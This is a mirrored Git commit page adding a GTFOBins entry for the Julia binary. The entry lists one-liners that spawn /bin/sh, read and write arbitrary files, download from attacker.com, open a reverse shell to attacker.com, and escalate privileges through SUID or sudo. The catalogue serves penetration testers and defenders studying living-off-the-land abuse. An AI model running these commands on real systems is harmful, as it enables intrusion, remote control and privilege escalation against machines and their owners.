public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-22 16:48:09 +02:00
Code Issues Projects Releases Wiki Activity

Merge pull request #382 from davidsonmizael/patch-1

Browse Source 
Add julia
This commit is contained in:
Andrea Cardaci 2023-04-20 08:52:02 +02:00 committed by GitHub
commit d48892a5cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
_gtfobins/julia.md Normal file
View File

@ -0,0 +1,31 @@
---
functions:
shell:
- code: |
julia -e 'run(`/bin/sh`)'
file-read:
- code: |
export LFILE=file_to_read
julia -e 'print(open(f->read(f, String), ENV["LFILE"]))'
file-write:
- code: |
export LFILE=file_to_write
julia -e 'open(f->write(f, "DATA"), ENV["LFILE"], "w")'
file-download:
- code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
julia -e 'download(ENV["URL"], ENV["LFILE"])'
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
julia -e 'using Sockets; sock=connect(ENV["RHOST"], parse(Int64,ENV["RPORT"])); while true; cmd = readline(sock); if !isempty(cmd); cmd = split(cmd); ioo = IOBuffer(); ioe = IOBuffer(); run(pipeline(`$cmd`, stdout=ioo, stderr=ioe)); write(sock, String(take!(ioo)) * String(take!(ioe))); end; end;'
suid:
- code: |
./julia -e 'run(`/bin/sh -p`)'
sudo:
- code: |
sudo julia -e 'run(`/bin/sh`)'
---